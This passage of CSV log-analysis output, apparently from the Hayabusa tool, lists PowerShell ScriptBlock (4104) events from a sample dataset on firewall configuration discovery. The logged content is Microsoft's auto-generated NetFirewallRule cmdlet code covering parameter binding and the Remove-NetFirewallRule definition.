$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} 
} else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
$false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { 
[object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletizat,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ion_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { 
[object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', 
$__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
